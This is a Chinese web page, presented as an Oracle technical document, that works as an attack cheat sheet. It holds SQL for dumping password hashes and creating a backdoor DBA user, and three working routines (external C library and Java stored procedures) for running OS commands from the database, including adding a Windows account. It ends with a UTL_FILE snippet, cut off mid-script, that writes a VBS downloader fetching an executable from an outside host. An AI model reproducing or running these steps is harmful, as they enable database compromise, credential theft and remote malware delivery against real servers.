-
您當(dāng)前所在位置:首頁 → 數(shù)據(jù)庫 → Oracle → oracle技術(shù)文檔
oracle技術(shù)文檔
時間:2015/6/28來源:IT貓撲網(wǎng)作者:網(wǎng)管聯(lián)盟我要評論(0)
-
第一部分
基本查詢指令
select * from V$PWFILE_USERS //查看dba用戶
select * from v$version //查看oracle版本以及系統(tǒng)版本
select * from session_privs;// 查看當(dāng)前用戶擁有的權(quán)限值
select * from user_role_privs\\查詢當(dāng)前用戶角色
select * from user_sys_privs\\查詢當(dāng)前用戶系統(tǒng)權(quán)限
select username,password from dba_users; //查看所有用戶密碼hash
select * from dba_sys_privs where grantee='SYSTEM';\\查系統(tǒng)權(quán)限
grant select any dictionary to system with admin option;\\登陸不上OEM時候需要此權(quán)限
Select name,password FROM user$ Where name='SCOTT'; //低版本查看單用戶密碼
Select username,decode(password,NULL,'NULL',password) password FROM dba_users; //查看用戶hash
create user bob identified by iloveyou;\\建用戶bob密碼iloveyou
grant dba to bob;\\賦予bob DBA權(quán)限
grant execute on xmldom to bob \\賦予用戶execute
Create ROLE "javauserpriv" NOT IDENTIFIED
Create ROLE "javasyspriv" NOT IDENTIFIED \\當(dāng)提示role 'JAVASYSPRIV' does not exist使用
select grantee from dba_role_privs where granted_role='DBA'; \\檢查那些用戶有DBA權(quán)限
select * from dba_directories;\\查看路徑所在目錄
第二部分,創(chuàng)建java,執(zhí)行系統(tǒng)命令
no.1
Create or REPLACE LIBRARY exec_shell AS 'c:\windows\system32\msvcrt.dll';
/
show errors
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
Create or REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors上面這個沒有回顯的
如果不行可以使用下面這個
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME\msvcrt.dll';
/
show errors
Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);
end oracmd;
/
show errors
Create or REPLACE PACKAGE BODY oracmd IS
PROCEDURE exec(cmdstring IN CHAR)
IS EXTERNAL
NAME "system"
LIBRARY exec_shell
LANGUAGE C;
end oracmd;
/
show errors執(zhí)行完后
執(zhí)行
exec oracmd.exec ('net1 user robert iloveyou /add');no2.
Create or REPLACE AND COMPILE JAVA SOURCE NAMED "Host" AS
import java.io.*;
public class Host {
public static void executeCommand(String command) {
try {
String[] finalCommand;
if (isWindows()) {
finalCommand = new String[4];
// Use the appropriate path for your windows version.
finalCommand[0] = "C:\\windows\\system32\\cmd.exe"; // Windows XP/2003
//finalCommand[0] = "C:\\winnt\\system32\\cmd.exe"; // Windows NT/2000
finalCommand[1] = "/y";
finalCommand[2] = "/c";
finalCommand[3] = command;
}
else {
finalCommand = new String[3];
finalCommand[0] = "/bin/sh";
finalCommand[1] = "-c";
finalCommand[2] = command;
}
final Process pr = Runtime.getRuntime().exec(finalCommand);
pr.waitFor();
new Thread(new Runnable(){
public void run() {
BufferedReader br_in = null;
try {
br_in = new BufferedReader(new InputStreamReader(pr.getInputStream()));
String buff = null;
while ((buff = br_in.readLine()) != null) {
System.out.println("Process out :" + buff);
try {Thread.sleep(100); } catch(Exception e) {}
}
br_in.close();
}
catch (IOException ioe) {
System.out.println("Exception caught printing process output.");
ioe.printStackTrace();
}
finally {
try {
br_in.close();
} catch (Exception ex) {}
}
}
}).start();
new Thread(new Runnable(){
public void run() {
BufferedReader br_err = null;
try {
br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream()));
String buff = null;
while ((buff = br_err.readLine()) != null) {
System.out.println("Process err :" + buff);
try {Thread.sleep(100); } catch(Exception e) {}
}
br_err.close();
}
catch (IOException ioe) {
System.out.println("Exception caught printing process error.");
ioe.printStackTrace();
}
finally {
try {
br_err.close();
} catch (Exception ex) {}
}
}
}).start();
}
catch (Exception ex) {
System.out.println(ex.getLocalizedMessage());
}
}
public static boolean isWindows() {
if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
return true;
else
return false;
}
};
/
Create or REPLACE PROCEDURE host_command (p_command IN VARCHAR2)
AS LANGUAGE JAVA
NAME 'Host.executeCommand (java.lang.String)';
/
EXEC DBMS_JAVA.grant_permission('SYSTEM', 'java.io.FilePermission', '<>', 'read ,write, execute, delete');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
/
DECLARE
l_output DBMS_OUTPUT.chararr;
l_lines INTEGER := 1000;
BEGIN
DBMS_OUTPUT.enable(1000000);
DBMS_JAVA.set_output(1000000);
host_command('dir C:\');
DBMS_OUTPUT.get_lines(l_output, l_lines);
END;這個要注意兩點
win下注意系統(tǒng)路徑
linx下注意注釋掉win
最后一句就是執(zhí)行命令的
host_command('dir C:\');
#p#副標(biāo)題#e#
no3.
create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}
/
create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';
/
create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;
/
variable x number;
set serveroutput on;
exec dbms_java.set_output(100000);
grant javasyspriv to system;這句注意最后這里要授權(quán)下當(dāng)前登陸的用戶
grant javasyspriv to system最后執(zhí)行
exec :x:=run_cmz('ipconfig');第二部分 操作磁盤文件
no1.
建立目錄
create or replace directory DIR as 'C:\';此目錄當(dāng)然也可以是啟動目錄
授權(quán)
grant read, write on directory DIR to system這步可以不用
然后執(zhí)行操作
寫文件
declare
file utl_file.file_type;
begin
file := utl_file.fopen('DIR', 'test.vbs', 'W');
utl_file.put_line(file, 'Set xPost=CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http:/ /blog.cnmoker.org/rad.exe",0
xPost.Send()
Set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "c:\rad
關(guān)鍵詞標(biāo)簽:oracle
相關(guān)閱讀
-
熱門文章
Oracle中使用alter table來增加,刪除,修改列oracle中使用SQL語句修改字段類型-oracle修使用低權(quán)限Oracle數(shù)據(jù)庫賬戶得到管理員權(quán)限Oracle對user的訪問控制
人氣排行
ORACLE SQL 判斷字符串是否為數(shù)字的語句Oracle中使用alter table來增加,刪除,修改列的語法ORACLE和SQL語法區(qū)別歸納(1)oracle grant 授權(quán)語句如何加速Oracle大批量數(shù)據(jù)處理Oracle刪除表的幾種方法ORACLE修改IP地址后如何能夠使用Oracle 10g創(chuàng)建表空間和用戶并指定權(quán)限